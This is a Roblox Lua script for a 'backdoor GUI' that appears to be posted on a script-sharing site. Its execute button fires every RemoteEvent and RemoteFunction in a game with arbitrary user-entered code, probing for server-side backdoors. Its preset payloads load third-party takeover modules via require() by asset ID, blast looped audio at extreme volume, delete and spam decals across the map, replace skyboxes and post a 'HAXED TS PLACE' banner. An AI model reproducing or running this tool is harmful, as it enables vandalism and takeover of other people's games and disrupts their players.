--[[
	WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
]]
--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 

designed using localmaze gui creator
]=]

local LMG2L = {};

local lp = game.Players.LocalPlayer
if not lp then return end

local gui = Instance.new("ScreenGui")
gui.Name = "ScreenGui_1"
gui.ResetOnSpawn = false
gui.Parent = lp.PlayerGui
LMG2L["ScreenGui_1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;


LMG2L["Frame_2"] = Instance.new("Frame", LMG2L["ScreenGui_1"]);
LMG2L["Frame_2"]["BorderSizePixel"] = 5;
LMG2L["Frame_2"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Frame_2"]["Size"] = UDim2.new(0, 398, 0, 600);
LMG2L["Frame_2"]["Position"] = UDim2.new(0, 132, 0, -26);
LMG2L["Frame_2"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);


LMG2L["execute_3"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["execute_3"]["BorderSizePixel"] = 3;
LMG2L["execute_3"]["TextSize"] = 10;
LMG2L["execute_3"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["execute_3"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["execute_3"]["Size"] = UDim2.new(0, 390, 0, 40);
LMG2L["execute_3"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["execute_3"]["Text"] = [[Execute script (click on any script and then click this)]];
LMG2L["execute_3"]["Name"] = [[execute]];
LMG2L["execute_3"]["Position"] = UDim2.new(0, 4, 0, 46);
LMG2L["execute_3"].MouseButton1Click:Connect(function()
local box = LMG2L["TextBox_d"]
    local code = box.Text
    if code == "" or code == "lol" then return end
 
    local RS = game:GetService("ReplicatedStorage")
    local WS = game:GetService("Workspace")
 
    local args = {code}
    local fired = {}
 
    local function collectArgs(container)
        for _, v in ipairs(container:GetDescendants()) do
            if v:IsA("ValueBase") then
                table.insert(args, v.Value)
            end
        end
    end
 
    collectArgs(RS)
    collectArgs(WS)
 
    local function fireOnce(r)
        if fired[r] then return end
        fired[r] = true
 
        pcall(function()
            if r:IsA("RemoteEvent") then
                r:FireServer(unpack(args))
            elseif r:IsA("RemoteFunction") then
                r:InvokeServer(unpack(args))
            end
        end)
    end
 
    for _, r in ipairs(RS:GetDescendants()) do
        if r:IsA("RemoteEvent") or r:IsA("RemoteFunction") then
            fireOnce(r)
        end
    end
end)


LMG2L["BotSong_4"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["BotSong_4"]["BorderSizePixel"] = 3;
LMG2L["BotSong_4"]["TextSize"] = 15;
LMG2L["BotSong_4"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["BotSong_4"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["BotSong_4"]["Size"] = UDim2.new(0, 118, 0, 42);
LMG2L["BotSong_4"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["BotSong_4"]["Text"] = [[BotSong]];
LMG2L["BotSong_4"]["Name"] = [[BotSong]];
LMG2L["BotSong_4"]["Position"] = UDim2.new(0, 272, 0, 474);
LMG2L["BotSong_4"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[local sound = Instance.new("Sound")
    sound.SoundId = "rbxassetid://5228173823"
    sound.PlaybackSpeed = 1
    sound.Parent = workspace
    sound.Looped = true
    sound.Volume = 10000
    sound:Play()]]
end)

LMG2L["particles2_5"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["particles2_5"]["BorderSizePixel"] = 3;
LMG2L["particles2_5"]["TextSize"] = 12;
LMG2L["particles2_5"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["particles2_5"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["particles2_5"]["Size"] = UDim2.new(0, 82, 0, 42);
LMG2L["particles2_5"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["particles2_5"]["Text"] = [[Particles 2]];
LMG2L["particles2_5"]["Name"] = [[particles2]];
LMG2L["particles2_5"]["Position"] = UDim2.new(0, 98, 0, 222);
LMG2L["particles2_5"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[game.Players.PlayerAdded:Connect(function(player)
    player.CharacterAdded:Connect(function(character)
        local torso = character:FindFirstChild("Torso") or character:FindFirstChild("UpperTorso")
        if torso then
            local pe = Instance.new("ParticleEmitter", torso)
            pe.Texture = "rbxassetid://98168110733513"
            pe.VelocitySpread = 50
            
            local se = Instance.new("ParticleEmitter", torso)
            se.Texture = "rbxassetid://98168110733513"
            se.VelocitySpread = 50
            
            local fe = Instance.new("ParticleEmitter", torso)
            fe.Texture = "rbxassetid://98168110733513"
            fe.VelocitySpread = 50
        end
    end)
end)

for _, player in pairs(game.Players:GetPlayers()) do
    if player.Character then
        local torso = player.Character:FindFirstChild("Torso") or player.Character:FindFirstChild("UpperTorso")
        if torso then
            local pe = Instance.new("ParticleEmitter", torso)
            pe.Texture = "rbxassetid://98168110733513"
            pe.VelocitySpread = 50
            
            local se = Instance.new("ParticleEmitter", torso)
            se.Texture = "rbxassetid://98168110733513"
            se.VelocitySpread = 50
            
            local fe = Instance.new("ParticleEmitter", torso)
            fe.Texture = "rbxassetid://98168110733513"
            fe.VelocitySpread = 50
        end
    end
end]]
end)


LMG2L["Stopmusic_6"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["Stopmusic_6"]["BorderSizePixel"] = 3;
LMG2L["Stopmusic_6"]["TextSize"] = 15;
LMG2L["Stopmusic_6"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Stopmusic_6"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Stopmusic_6"]["Size"] = UDim2.new(0, 118, 0, 42);
LMG2L["Stopmusic_6"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Stopmusic_6"]["Text"] = [[Stop music]];
LMG2L["Stopmusic_6"]["Name"] = [[Stopmusic]];
LMG2L["Stopmusic_6"]["Position"] = UDim2.new(0, 142, 0, 532);
LMG2L["Stopmusic_6"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[local class_check = game.IsA
local sound = Instance.new('Sound')
local sound_stop = sound.Stop
local get_descendants = game.GetDescendants

for i,v in next, get_descendants(game) do 
	if class_check(v,"Sound") then
		sound_stop(v)
	end
end
-- release variables into the wild, aka let them be used again
get_descendants = nil
sound:Remove()
-- :triggered:
sound = nil 
get_descendants = nil
sound_stop = nil]]
end)

LMG2L["Saitama_7"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["Saitama_7"]["BorderSizePixel"] = 3;
LMG2L["Saitama_7"]["TextSize"] = 12;
LMG2L["Saitama_7"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Saitama_7"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Saitama_7"]["Size"] = UDim2.new(0, 76, 0, 42);
LMG2L["Saitama_7"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Saitama_7"]["Text"] = [[Saitama]];
LMG2L["Saitama_7"]["Name"] = [[Saitama]];
LMG2L["Saitama_7"]["Position"] = UDim2.new(0, 210, 0, 274);
LMG2L["Saitama_7"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[require(14499140823)("Bacon_invincible228", "saitama2")]]
end)


LMG2L["DNGv2_8"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["DNGv2_8"]["BorderSizePixel"] = 3;
LMG2L["DNGv2_8"]["TextSize"] = 17;
LMG2L["DNGv2_8"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["DNGv2_8"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["DNGv2_8"]["Size"] = UDim2.new(0, 118, 0, 42);
LMG2L["DNGv2_8"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["DNGv2_8"]["Text"] = [[DNG V2]];
LMG2L["DNGv2_8"]["Name"] = [[DNGv2]];
LMG2L["DNGv2_8"]["Position"] = UDim2.new(0, 274, 0, 326);
LMG2L["DNGv2_8"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[require(109803336108428).DNGVDva("Bacon_invincible228")]]
end)


LMG2L["TextLabel2_9"] = Instance.new("TextLabel", LMG2L["Frame_2"]);
LMG2L["TextLabel2_9"]["BorderSizePixel"] = 0;
LMG2L["TextLabel2_9"]["TextSize"] = 20;
LMG2L["TextLabel2_9"]["TextStrokeColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["TextLabel2_9"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["TextLabel2_9"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["TextLabel2_9"]["Size"] = UDim2.new(0, 346, 0, 26);
LMG2L["TextLabel2_9"]["Text"] = [[-- Music --]];
LMG2L["TextLabel2_9"]["Name"] = [[TextLabel2]];
LMG2L["TextLabel2_9"]["Position"] = UDim2.new(0, 28, 0, 378);


LMG2L["Jumpstyle_a"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["Jumpstyle_a"]["BorderSizePixel"] = 3;
LMG2L["Jumpstyle_a"]["TextSize"] = 12;
LMG2L["Jumpstyle_a"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Jumpstyle_a"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Jumpstyle_a"]["Size"] = UDim2.new(0, 88, 0, 42);
LMG2L["Jumpstyle_a"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Jumpstyle_a"]["Text"] = [[Jumpstyle]];
LMG2L["Jumpstyle_a"]["Name"] = [[Jumpstyle]];
LMG2L["Jumpstyle_a"]["Position"] = UDim2.new(0, 142, 0, 412);
LMG2L["Jumpstyle_a"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[local sound = Instance.new("Sound")
    sound.SoundId = "rbxassetid://1839246711"
    sound.PlaybackSpeed = 1
    sound.Parent = workspace
    sound.Looped = true
    sound.Volume = 10000
    sound:Play()]]
end)

LMG2L["TextLabel2_b"] = Instance.new("TextLabel", LMG2L["Frame_2"]);
LMG2L["TextLabel2_b"]["BorderSizePixel"] = 0;
LMG2L["TextLabel2_b"]["TextSize"] = 20;
LMG2L["TextLabel2_b"]["TextStrokeColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["TextLabel2_b"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["TextLabel2_b"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["TextLabel2_b"]["Size"] = UDim2.new(0, 346, 0, 0);
LMG2L["TextLabel2_b"]["Text"] = [[-- Scripts --]];
LMG2L["TextLabel2_b"]["Name"] = [[TextLabel2]];
LMG2L["TextLabel2_b"]["Position"] = UDim2.new(0, 28, 0, 146);


LMG2L["TextLabel_c"] = Instance.new("TextLabel", LMG2L["Frame_2"]);
LMG2L["TextLabel_c"]["BorderSizePixel"] = 0;
LMG2L["TextLabel_c"]["TextSize"] = 20;
LMG2L["TextLabel_c"]["TextStrokeColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["TextLabel_c"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["TextLabel_c"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["TextLabel_c"]["Size"] = UDim2.new(0, 46, 0, 0);
LMG2L["TextLabel_c"]["Text"] = [[Mangotrollfaceedit backdoor GUI]];
LMG2L["TextLabel_c"]["Position"] = UDim2.new(0, 176, 0, 18);


LMG2L["TextBox_d"] = Instance.new("TextBox", LMG2L["Frame_2"]);
LMG2L["TextBox_d"]["BorderSizePixel"] = 3;
LMG2L["TextBox_d"]["BackgroundColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["TextBox_d"]["RichText"] = true;
LMG2L["TextBox_d"]["Position"] = UDim2.new(11000, 2, 0, 34);
LMG2L["TextBox_d"]["Text"] = [[]];


LMG2L["C00lgui_e"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["C00lgui_e"]["BorderSizePixel"] = 3;
LMG2L["C00lgui_e"]["TextSize"] = 12;
LMG2L["C00lgui_e"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["C00lgui_e"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["C00lgui_e"]["Size"] = UDim2.new(0, 76, 0, 42);
LMG2L["C00lgui_e"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["C00lgui_e"]["Text"] = [[C00lgui]];
LMG2L["C00lgui_e"]["Name"] = [[C00lgui]];
LMG2L["C00lgui_e"]["Position"] = UDim2.new(0, 124, 0, 274);
LMG2L["C00lgui_e"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[require(14125553864):Fire("Bacon_invincible228","c00lkidd")]]
end)

LMG2L["Skeletonsky_f"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["Skeletonsky_f"]["BorderSizePixel"] = 3;
LMG2L["Skeletonsky_f"]["TextSize"] = 12;
LMG2L["Skeletonsky_f"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Skeletonsky_f"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Skeletonsky_f"]["Size"] = UDim2.new(0, 106, 0, 42);
LMG2L["Skeletonsky_f"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Skeletonsky_f"]["Text"] = [[Skeleton Sky]];
LMG2L["Skeletonsky_f"]["Name"] = [[Skeletonsky]];
LMG2L["Skeletonsky_f"]["Position"] = UDim2.new(0, 8, 0, 274);
LMG2L["Skeletonsky_f"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[imageOne = "http://www.roblox.com/asset/?id=169585459"
imageTwo = "http://www.roblox.com/asset/?id=169585475"
imageThree = "http://www.roblox.com/asset/?id=169585485"
imageFour = "http://www.roblox.com/asset/?id=169585502"
imageFive = "http://www.roblox.com/asset/?id=169585515"
imageSix = "http://www.roblox.com/asset/?id=169585502"
imageSeven = "http://www.roblox.com/asset/?id=169585485"
imageEight = "http://www.roblox.com/asset/?id=169585475"

Spooky = Instance.new("Sound", workspace)
Spooky.Name = "Spooky"
Spooky.SoundId = "rbxassetid://174270407"
Spooky.Volume = 15
Spooky.Looped = true
Spooky:Play()

Sky = Instance.new("Sky", game.Lighting)
Sky.SkyboxBk = imageOne
Sky.SkyboxDn = imageOne
Sky.SkyboxFt = imageOne
Sky.SkyboxLf = imageOne
Sky.SkyboxRt = imageOne
Sky.SkyboxUp = imageOne


while true do
    Sky.SkyboxBk = imageOne
    Sky.SkyboxDn = imageOne
    Sky.SkyboxFt = imageOne
    Sky.SkyboxLf = imageOne
    Sky.SkyboxRt = imageOne
    Sky.SkyboxUp = imageOne
    wait(0.15)
    Sky.SkyboxBk = imageTwo
    Sky.SkyboxDn = imageTwo
    Sky.SkyboxFt = imageTwo
    Sky.SkyboxLf = imageTwo
    Sky.SkyboxRt = imageTwo
    Sky.SkyboxUp = imageTwo
    wait(0.15)
    Sky.SkyboxBk = imageThree
    Sky.SkyboxDn = imageThree
    Sky.SkyboxFt = imageThree
    Sky.SkyboxLf = imageThree
    Sky.SkyboxRt = imageThree
    Sky.SkyboxUp = imageThree
    wait(0.15)
    Sky.SkyboxBk = imageFour
    Sky.SkyboxDn = imageFour
    Sky.SkyboxFt = imageFour
    Sky.SkyboxLf = imageFour
    Sky.SkyboxRt = imageFour
    Sky.SkyboxUp = imageFour
    wait(0.15)
    Sky.SkyboxBk = imageFive
    Sky.SkyboxDn = imageFive
    Sky.SkyboxFt = imageFive
    Sky.SkyboxLf = imageFive
    Sky.SkyboxRt = imageFive
    Sky.SkyboxUp = imageFive
    wait(0.15)
    Sky.SkyboxBk = imageSix
    Sky.SkyboxDn = imageSix
    Sky.SkyboxFt = imageSix
    Sky.SkyboxLf = imageSix
    Sky.SkyboxRt = imageSix
    Sky.SkyboxUp = imageSix
    wait(0.15)
    Sky.SkyboxBk = imageSeven
    Sky.SkyboxDn = imageSeven
    Sky.SkyboxFt = imageSeven
    Sky.SkyboxLf = imageSeven
    Sky.SkyboxRt = imageSeven
    Sky.SkyboxUp = imageSeven
    wait(0.15)
    Sky.SkyboxBk = imageEight
    Sky.SkyboxDn = imageEight
    Sky.SkyboxFt = imageEight
    Sky.SkyboxLf = imageEight
    Sky.SkyboxRt = imageEight
    Sky.SkyboxUp = imageEight
    wait(0.15)
    
end]]
end)


LMG2L["skybox_10"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["skybox_10"]["BorderSizePixel"] = 3;
LMG2L["skybox_10"]["TextSize"] = 12;
LMG2L["skybox_10"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["skybox_10"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["skybox_10"]["Size"] = UDim2.new(0, 70, 0, 38);
LMG2L["skybox_10"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["skybox_10"]["Text"] = [[Skybox]];
LMG2L["skybox_10"]["Name"] = [[skybox]];
LMG2L["skybox_10"]["Position"] = UDim2.new(0, 242, 0, 170);
LMG2L["skybox_10"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[s = Instance.new("Sky")
s.Name = "Sky"
s.Parent = game.Lighting
s.SkyboxBk = "http://www.roblox.com/asset/?id=75055067322540"
s.SkyboxDn = "http://www.roblox.com/asset/?id=75055067322540"
s.SkyboxFt = "http://www.roblox.com/asset/?id=75055067322540"
s.SkyboxLf = "http://www.roblox.com/asset/?id=75055067322540"
s.SkyboxRt = "http://www.roblox.com/asset/?id=75055067322540" 
s.SkyboxUp = "http://www.roblox.com/asset/?id=75055067322540"
game.Lighting.TimeOfDay = 12]]
end)


LMG2L["Jumpstyleloop_11"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["Jumpstyleloop_11"]["BorderSizePixel"] = 3;
LMG2L["Jumpstyleloop_11"]["TextSize"] = 12;
LMG2L["Jumpstyleloop_11"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Jumpstyleloop_11"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Jumpstyleloop_11"]["Size"] = UDim2.new(0, 120, 0, 42);
LMG2L["Jumpstyleloop_11"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Jumpstyleloop_11"]["Text"] = [[Jumpstyleloop]];
LMG2L["Jumpstyleloop_11"]["Name"] = [[Jumpstyleloop]];
LMG2L["Jumpstyleloop_11"]["Position"] = UDim2.new(0, 142, 0, 474);
LMG2L["Jumpstyleloop_11"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[local sound = Instance.new("Sound")
    sound.SoundId = "rbxassetid://134359663422051"
    sound.PlaybackSpeed = 1
    sound.Parent = workspace
    sound.Looped = true
    sound.Volume = 10000
    sound:Play()]]
end)


LMG2L["skybox2_12"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["skybox2_12"]["BorderSizePixel"] = 3;
LMG2L["skybox2_12"]["TextSize"] = 12;
LMG2L["skybox2_12"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["skybox2_12"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["skybox2_12"]["Size"] = UDim2.new(0, 70, 0, 38);
LMG2L["skybox2_12"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["skybox2_12"]["Text"] = [[Skybox 2]];
LMG2L["skybox2_12"]["Name"] = [[skybox2]];
LMG2L["skybox2_12"]["Position"] = UDim2.new(0, 324, 0, 170);
LMG2L["skybox2_12"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[s = Instance.new("Sky")
s.Name = "Sky"
s.Parent = game.Lighting
s.SkyboxBk = "http://www.roblox.com/asset/?id=98168110733513"
s.SkyboxDn = "http://www.roblox.com/asset/?id=98168110733513"
s.SkyboxFt = "http://www.roblox.com/asset/?id=98168110733513"
s.SkyboxLf = "http://www.roblox.com/asset/?id=98168110733513"
s.SkyboxRt = "http://www.roblox.com/asset/?id=98168110733513" 
s.SkyboxUp = "http://www.roblox.com/asset/?id=98168110733513"
game.Lighting.TimeOfDay = 12]]
end)

LMG2L["decalspam2_13"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["decalspam2_13"]["BorderSizePixel"] = 3;
LMG2L["decalspam2_13"]["TextSize"] = 12;
LMG2L["decalspam2_13"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["decalspam2_13"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["decalspam2_13"]["Size"] = UDim2.new(0, 106, 0, 38);
LMG2L["decalspam2_13"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["decalspam2_13"]["Text"] = [[Decal spam 2]];
LMG2L["decalspam2_13"]["Name"] = [[decalspam2]];
LMG2L["decalspam2_13"]["Position"] = UDim2.new(0, 124, 0, 170);
LMG2L["decalspam2_13"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[function exPro(root)
		for _, v in pairs(root:GetChildren()) do
			if v:IsA("Decal") and v.Texture ~= "http://www.roblox.com/asset/?id=5873794859" then
				v.Parent = nil
			elseif v:IsA("BasePart") then
				v.Material = "Plastic"
				v.Transparency = 0
				local One = Instance.new("Decal", v)
				local Two = Instance.new("Decal", v)
				local Three = Instance.new("Decal", v)
				local Four = Instance.new("Decal", v)
				local Five = Instance.new("Decal", v)
				local Six = Instance.new("Decal", v)
				One.Texture = "http://www.roblox.com/asset/?id=5873794859" 
				Two.Texture = "http://www.roblox.com/asset/?id=5873794859" 
				Three.Texture = "http://www.roblox.com/asset/?id=5873794859" 
				Four.Texture = "http://www.roblox.com/asset/?id=5873794859" 
				Five.Texture = "http://www.roblox.com/asset/?id=5873794859" 
				Six.Texture = "http://www.roblox.com/asset/?id=5873794859" 
				One.Face = "Front"
				Two.Face = "Back"
				Three.Face = "Right"
				Four.Face = "Left"
				Five.Face = "Top"
				Six.Face = "Bottom"
			end
			exPro(v)
		end
	end
	function asdf(root)
		for _, v in pairs(root:GetChildren()) do
			asdf(v)
		end
	end
	exPro(game.Workspace)
	asdf(game.Workspace)]]
end)


LMG2L["HappyHub_14"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["HappyHub_14"]["BorderSizePixel"] = 3;
LMG2L["HappyHub_14"]["TextSize"] = 12;
LMG2L["HappyHub_14"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["HappyHub_14"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["HappyHub_14"]["Size"] = UDim2.new(0, 112, 0, 42);
LMG2L["HappyHub_14"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["HappyHub_14"]["Text"] = [[HappyHub SS]];
LMG2L["HappyHub_14"]["Name"] = [[HappyHub]];
LMG2L["HappyHub_14"]["Position"] = UDim2.new(0, 282, 0, 222);
LMG2L["HappyHub_14"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[require(88812096580830):Hload("Bacon_invincible228")]]
end)

LMG2L["decalspam_15"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["decalspam_15"]["BorderSizePixel"] = 3;
LMG2L["decalspam_15"]["TextSize"] = 12;
LMG2L["decalspam_15"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["decalspam_15"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["decalspam_15"]["Size"] = UDim2.new(0, 104, 0, 38);
LMG2L["decalspam_15"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["decalspam_15"]["Text"] = [[Decal spam]];
LMG2L["decalspam_15"]["Name"] = [[decalspam]];
LMG2L["decalspam_15"]["Position"] = UDim2.new(0, 8, 0, 170);
LMG2L["decalspam_15"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[function exPro(root)
		for _, v in pairs(root:GetChildren()) do
			if v:IsA("Decal") and v.Texture ~= "http://www.roblox.com/asset/?id=75055067322540" then
				v.Parent = nil
			elseif v:IsA("BasePart") then
				v.Material = "Plastic"
				v.Transparency = 0
				local One = Instance.new("Decal", v)
				local Two = Instance.new("Decal", v)
				local Three = Instance.new("Decal", v)
				local Four = Instance.new("Decal", v)
				local Five = Instance.new("Decal", v)
				local Six = Instance.new("Decal", v)
				One.Texture = "http://www.roblox.com/asset/?id=75055067322540" 
				Two.Texture = "http://www.roblox.com/asset/?id=75055067322540" 
				Three.Texture = "http://www.roblox.com/asset/?id=75055067322540" 
				Four.Texture = "http://www.roblox.com/asset/?id=75055067322540" 
				Five.Texture = "http://www.roblox.com/asset/?id=75055067322540" 
				Six.Texture = "http://www.roblox.com/asset/?id=75055067322540" 
				One.Face = "Front"
				Two.Face = "Back"
				Three.Face = "Right"
				Four.Face = "Left"
				Five.Face = "Top"
				Six.Face = "Bottom"
			end
			exPro(v)
		end
	end
	function asdf(root)
		for _, v in pairs(root:GetChildren()) do
			asdf(v)
		end
	end
	exPro(game.Workspace)
	asdf(game.Workspace)]]
end)


LMG2L["Theme_16"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["Theme_16"]["BorderSizePixel"] = 3;
LMG2L["Theme_16"]["TextSize"] = 12;
LMG2L["Theme_16"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Theme_16"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Theme_16"]["Size"] = UDim2.new(0, 114, 0, 42);
LMG2L["Theme_16"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Theme_16"]["Text"] = [[Theme]];
LMG2L["Theme_16"]["Name"] = [[Theme]];
LMG2L["Theme_16"]["Position"] = UDim2.new(0, 12, 0, 412);
LMG2L["Theme_16"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[local sound = Instance.new("Sound")
    sound.SoundId = "rbxassetid://1839270925"
    sound.PlaybackSpeed = 1
    sound.Parent = workspace
    sound.Looped = true
    sound.Volume = 10000
    sound:Play()]]
end)


LMG2L["Bloodpop_17"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["Bloodpop_17"]["BorderSizePixel"] = 3;
LMG2L["Bloodpop_17"]["TextSize"] = 12;
LMG2L["Bloodpop_17"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Bloodpop_17"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Bloodpop_17"]["Size"] = UDim2.new(0, 114, 0, 42);
LMG2L["Bloodpop_17"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Bloodpop_17"]["Text"] = [[Blood pop]];
LMG2L["Bloodpop_17"]["Name"] = [[Bloodpop]];
LMG2L["Bloodpop_17"]["Position"] = UDim2.new(0, 12, 0, 474);
LMG2L["Bloodpop_17"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[local sound = Instance.new("Sound")
    sound.SoundId = "rbxassetid://133251269532695"
    sound.PlaybackSpeed = 0.145
    sound.Parent = workspace
    sound.Looped = true
    sound.Volume = 10000
    sound:Play()]]
end)


LMG2L["Hint_18"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["Hint_18"]["BorderSizePixel"] = 3;
LMG2L["Hint_18"]["TextSize"] = 12;
LMG2L["Hint_18"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Hint_18"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Hint_18"]["Size"] = UDim2.new(0, 168, 0, 34);
LMG2L["Hint_18"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Hint_18"]["Text"] = [[Hint]];
LMG2L["Hint_18"]["Name"] = [[Hint]];
LMG2L["Hint_18"]["Position"] = UDim2.new(0, 66, 0, 96);
LMG2L["Hint_18"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[local H = Instance.new("Hint")
H.Text = "EL MANGOTROLLFACEEDIT HAXED TS PLACE | YT:@Mangotrollfaceedit"
H.Parent = game.Workspace]]
end)


LMG2L["r6_19"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["r6_19"]["BorderSizePixel"] = 3;
LMG2L["r6_19"]["TextSize"] = 10;
LMG2L["r6_19"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["r6_19"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["r6_19"]["Size"] = UDim2.new(0, 52, 0, 40);
LMG2L["r6_19"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["r6_19"]["Text"] = [[R6]];
LMG2L["r6_19"]["Name"] = [[r6]];
LMG2L["r6_19"]["Position"] = UDim2.new(0, 4, 0, 96);
LMG2L["r6_19"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[require(3436957371):r6("ifioood")]]
end)


